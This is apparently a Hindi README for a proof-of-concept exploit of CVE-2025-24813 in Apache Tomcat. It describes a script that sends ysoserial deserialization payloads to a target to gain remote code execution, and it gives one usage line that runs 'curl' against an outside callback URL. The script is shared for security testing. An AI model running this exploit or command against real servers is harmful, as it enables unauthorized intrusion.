
CVE-2025-24813 के लिए एक PoC
CVE-2025-24813 Apache Tomcat को प्रभावित करता है - यदि यह एक असुरक्षित संस्करण है और बेहद गलत तरीके से कॉन्फ़िगर किया गया है, तो एक हमलावर एक GET और एक POST के साथ RCE प्राप्त कर सकता है।
अधिक जानकारी यहाँ
यह Yiheng An, Jun Li, Qiang Liu, Haozhe Zhang, Qi Deng की स्क्रिप्ट है, जो हालिया रिपोर्ट से ली गई है और इसे एक कमांड स्वीकार करने, सभी ysoserial गैजेट पेलोड उत्पन्न करने और आपके लक्ष्य पर भेजने के लिए संशोधित किया गया है।
नैतिक सुरक्षा परीक्षण के हित में साझा किया गया है।
उपयोग उदाहरण:
python3 exploit.py --command 'curl http://yourcollaburl' --target 'http://192.168.10.0.1:8080' --proxy '127.0.0.1:8080'
poc.mp4 स्क्रिप्ट को क्रियाशील दिखाता है, पेलोड उत्पन्न करके लक्ष्य पर भेजता है, और दाएँ पैन में हम देखते हैं कि interact listener को कॉल किया जा रहा है।